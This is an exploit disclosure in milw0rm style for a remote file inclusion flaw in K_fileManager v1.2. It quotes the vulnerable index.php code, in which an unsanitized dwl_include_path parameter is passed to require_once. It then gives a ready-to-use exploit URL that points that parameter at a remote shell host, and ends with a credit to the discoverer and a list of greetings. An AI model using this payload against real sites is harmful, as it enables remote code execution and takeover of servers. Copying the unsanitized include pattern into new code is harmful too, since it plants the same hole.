48 lines
No EOL
2 KiB
Text
48 lines
No EOL
2 KiB
Text
#=================================================================
|
|
#K_fileManager v1.2 <= (dwl_include_path) Remote File Inclusion Exploit
|
|
#================================================================
|
|
# |
|
|
#Critical Level : Dangerous |
|
|
# |
|
|
#Venedor site : http://knusperleicht.at/ |
|
|
# |
|
|
#Version : 1.2 |
|
|
# |
|
|
#=================================================================
|
|
#Bug in : index.php
|
|
#
|
|
#Vlu Code :
|
|
#--------------------------------
|
|
#/**********************************************************
|
|
#// INCLUDE PATH
|
|
#@define("DWL_INCLUDE_PATH",$dwl_include_path);
|
|
#// INCLUDE PATH
|
|
#//**********************************************************
|
|
#
|
|
#//Dateien importieren
|
|
# require_once(DWL_INCLUDE_PATH."inc/config.inc.php");
|
|
# require_once(DWL_INCLUDE_PATH."lang/".FM_LANGUAGE."/lang.inc.php");
|
|
# require_once(DWL_INCLUDE_PATH."inc/Dwl_template.php");
|
|
# require_once(DWL_INCLUDE_PATH."inc/Dwl_db.php");
|
|
# require_once(DWL_INCLUDE_PATH."inc/Dwl_directory.php");
|
|
# require_once(DWL_INCLUDE_PATH."inc/Dwl_stuff.php");
|
|
# require_once(DWL_INCLUDE_PATH."inc/Dwl_statistic.php");
|
|
#
|
|
#
|
|
#=================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/index.php?dwl_include_path=http://SHELLURL.COM?
|
|
#
|
|
#===============================================================================
|
|
#Discoverd By : SHiKaA
|
|
#
|
|
#Conatact : SHiKaA-[at]hotmail.com
|
|
#
|
|
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA Kashtawa
|
|
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
|
|
=================================================================
|
|
|
|
# milw0rm.com [2006-08-01] |